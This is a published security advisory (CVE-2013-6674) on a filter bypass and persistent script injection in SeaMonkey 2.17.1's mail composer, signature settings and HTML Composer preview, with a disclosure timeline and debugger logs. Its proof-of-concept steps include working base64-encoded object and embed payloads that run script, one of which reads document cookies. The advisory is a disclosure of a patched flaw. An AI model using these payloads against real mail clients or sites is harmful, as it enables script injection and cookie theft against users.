Document Title:
===============
Mozilla SeaMonkey - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=967
Mozilla Bug Tracking ID: 881686
http://www.vulnerability-lab.com/get_content.php?id=953
Mozilla Bug Tracking ID: 875818
Exclusive News: (Partners) http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vulnerability-Fixed-in-Thunderbird-420962.shtml
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6674
CVE-ID:
=======
CVE-2013-6674
Release Date:
=============
2014-01-29
Vulnerability Laboratory ID (VL-ID):
====================================
967
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
SeaMonkey is a free and open source cross-platform Internet suite. It is the continuation of the former Mozilla Application Suite,
based on the same source code. The development of SeaMonkey is community-driven, in contrast to the Mozilla Application Suite, which
until its last released version (1.7.13) was governed by the Mozilla Foundation. The new project-leading group is the SeaMonkey Council.
SeaMonkey consists of a web browser (SeaMonkey Navigator), which is a descendant of the Netscape family, an e-mail and news client
program (SeaMonkey Mail & Newsgroups, which shares code with Mozilla Thunderbird), an HTML editor (SeaMonkey Composer) and an IRC
client (ChatZilla). The software suite supports skins. It comes with two skins in the default installation, Modern and Classic.
Mail
Mail features includes support for multiple accounts {the documentation does not state how many}, junk mail detection, message filters,
HTML message support, a dictionary, an address book, customizable labels, add-ons and mail views as well as integration with the rest of suite.
Composer
SeaMonkey Composer 2.16 running on Ubuntu 12.04. SeaMonkey Composer is a WYSIWYG HTML editor. Its main user interface features four tabs:
Normal (WYSIWYG), HTML tags, HTML code, and browser preview. The generated code is HTML 4.01 Transitional. As of version 1.1.13,
SeaMonkey Composer supports basic text formatting and styling, insertion of hyperlinks and images, and the creation of tables. It does
not support the addition of form elements (text fields, check boxes, and buttons). SeaMonkey Composer is scheduled to be updated with the
release of KompoZer 0.8 which is currently under development.
Vendor Homepage: http://www.mozilla.org
Product website: http://www.seamonkey-project.org/releases/seamonkey2.17/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass and persistent validation web vulnerability in the Mozilla Seamonkey application.
Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mozilla
Product: Seamonkey 2.17.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Since Seamonkey is using Mozilla Thunderbird at the backend for its mail client, It is prone to the same Persistent vulnerability
that i had reported earlier to Mozilla Security Team.
I will include the details again in this advisory for your reference and ease.
Basically , attaching a debugger with the seamonkey binary file, it was initially noticed that malicious java-script tags were being
filtered / blocked. By default, HTML tags like <script> and <iframe> are blocked in Seamonkey and get filtered immediately upon
insertion however, While drafting a new email message, attackers can easily bypass the current input filters by encoding their
payloads with base64 encryption and using the <object> tag and insert malicious scripts / code eg. (script / frame) within the
emails and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the `Reply` or `Forward` Buttons.
After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send
it to victims. Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or
Forward, the exploit gets executed successfully. For a POC i will be including multiple examples in this advisory for your review.
I was able to run multiple scripts generating strange behaviour on the application which can be seen in the debugging errors
which I have attached along with this report.
These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete
compromise of the end user system. The persistent code injection vulnerability is located within the main application. Exploitation
of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of the vulnerability
may result in malicious script code being executed in the victims browser resulting in script code injection, persistent phishing,
Client side redirects and similar client side attacks.
Vulnerable Service(s):
[+] Seamonkey 2.17.1 - Latest Release
Vulnerable Section(s):
[+] Compose (Compose in HTML)
[+] Email Signature (Mail & Newsgroups Account Settings)
[+] Attach File with Signature as HTML (Mail & Newsgroups Account Settings)
Proof of Concept (PoC):
=======================
The validation and filter bypass vulnerability can be exploited by remote attackers without privileged application user account
and direct user interaction. To demonstrate or reproduce the vulnerability follow the provided steps and information below.
Proof of Concept #1
a) Create a new email message (Compose in HTML)
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim (your test email account)
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.
Proof of Concept #2
a) Goto Edit and then Mail & Newsgroups Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Compose" (compose in HTML) to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.
Proof of Concept #3
a) Create a new text file on your desktop (local computer), insert the POC payload and save it as test.html (HTML)
b) Goto Edit and then Mail & Newsgroups Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on "Compose" (Compose in HTML) and you should be able to see the Javascript popup proving the existence of this vulnerability.
Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg=="></object>
Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
1.3
POC Technical Description:
Here, we used the data URI payload as a value assigned to the ‘data’ attribute of the ‘object’ tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The ‘data’ attribute of the object tag defines a URL that refers to the
object’s data. Data in the "data:" URI is encoded as a base64 string:
Base64-encoded payload: PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==
Base64-decoded payload: <script>alert("Vulnerable");</script>
When the browser loads the object tag, it loads an object (in our case, it’s a javascript) assigned to its data attribute. This causes execution
of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload.
2.0
Seamonkey HTML Composer Preview - Input Filter Bypass Vulnerability
Details:
By default, html tags like <script> alert/prompt are being filtered in the Composer preview feature however, using the <object> and
or <embed> tags and base64 encoded payloads it is possible to bypass the current filters and execute script code. Even though I
noticed that once you save it as an .html file, all normal payloads like <script>alert(1)</script> work. Its an HTML composer,
maybe its not allowed to filter any dangerous / malicious code requests by default and I am definitely not challenging that fact
at all. I just felt its important to highlight the fact that if all other tags are being blocked in the preview, then this one
actually bypasses the current Seamonkey Composer preview filters and still works.
Vulnerable Product(s):
[+] Seamonkey 2.17.1 - Latest Release
Vulnerable Module(s):
[+] Composer (CTRL+4)
Vulnerable Section(s):
[+] HTML Source
2.1
Proof of Concept:
a) Open New Seamonkey Composer Window
b) Goto <HTML> Source
c) Copy/Paste any one of the payloads mentioned under the "Payload" section, anywhere in the Code before </body> tag.
Example Code that i used for this POC:
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
<title>testtesttest</title>
</head>
<body>
<br>
<h4> </h4>
<h2> <object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
</h2>
</body>
</html>
d) Click on Preview and you should be able to see a Javascript proving the existence of this Filter Bypass Vulnerability
Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>
Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB
2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj
48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlZ1bG5lcmFi
bGUiKTs8L3Njcml
wdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
2.3
Interesting Raw Application Logs captured during the entire process of testing:
[JavaScript Error: "ReferenceError: dOcUmeNt is not defined" {file: "data:text/html;base64,
PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 1}]
[JavaScript Error: "TypeError:
this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: t
his.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning:
"The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,
PHNjcmlwdD5hbGVydChkT2NVbWVOdC5Db29LaWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning:
"The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different
if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different
if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
ModLoad: 6fcd0000 6fce2000 C:\Windows\SysWOW64\dhcpcsvc.DLL
ModLoad: 6fcc0000 6fccd000 C:\Windows\SysWOW64\dhcpcsvc6.DLL
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if
viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Error:
"TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning:
"Unknown property '-moz-border-radius-bottomleft'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3E
jakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=
t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topleft'. Declaration dropped." {file: "https://www.google.com/search?q=
a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-topright'. Declaration dropped." {file: "https://www.google.com
/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius-bottomright'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F
%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Error in parsing value for 'filter'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf
%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-border-radius'. Declaration dropped." {file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf
%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
[JavaScript Warning: "Unknown property '-moz-box-shadow'. Declaration dropped."
{file: "https://www.google.com/search?q=a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a"
line: 1}]
[JavaScript Warning: "Unknown pseudo-class or pseudo-element '-ms-clear'. Ruleset ignored due to bad selector."
{file: "https://www.google.com/search?q=
a%2520%2F%3E%22%3Ch1%3Ejakjbsf%3C%2Fh1%3E&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=seamonkey-a" line: 1}]
ModLoad: 139d0000 13a21000 C:\Windows\SysWOW64\WINSPOOL.DRV
(1af0.258c): Unknown exception - code 000006ba (first chance)
[JavaScript Error: "NS_ERROR_NOT_INITIALIZED: Component returned failure code: 0xc1f30001 (NS_ERROR_NOT_INITIALIZED) [nsIEditor.selectionController]"
{file: "chrome://navigator/content/urlbarBindings.xml" line: 107}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "WARN addons.updates: Update manifest for [email protected] did not contain an updates property"
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
[JavaScript Warning: "WARN addons.updates: Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property"
{file: "resource://gre/modules/AddonUpdateChecker.jsm" line: 312}]
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
versioncheck.addons.mozilla.org : server does not support RFC 5746, see CVE-2009-3555
[JavaScript Error: "TypeError: this.tabbox is null" {file: "chrome://global/content/bindings/tabbox.xml" line: 480}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the
document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==" line: 0}]
[JavaScript Warning: "The character encoding declaration of the HTML document was not found when prescanning the first 1024 bytes of the file.
When viewed
in a differently-configured browser, this page will reload automatically. The encoding declaration needs to be moved to be within the first
1024 bytes of
the file." {file: "file:///C:/Users/John%20Doe/Desktop/testtesttest.html" line: 5}]
Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
Security Risk:
==============
The security risk of the persistent input validation and input filter bypass vulnerabilities are estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan [[email protected]] [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2014 | Vulnerability Laboratory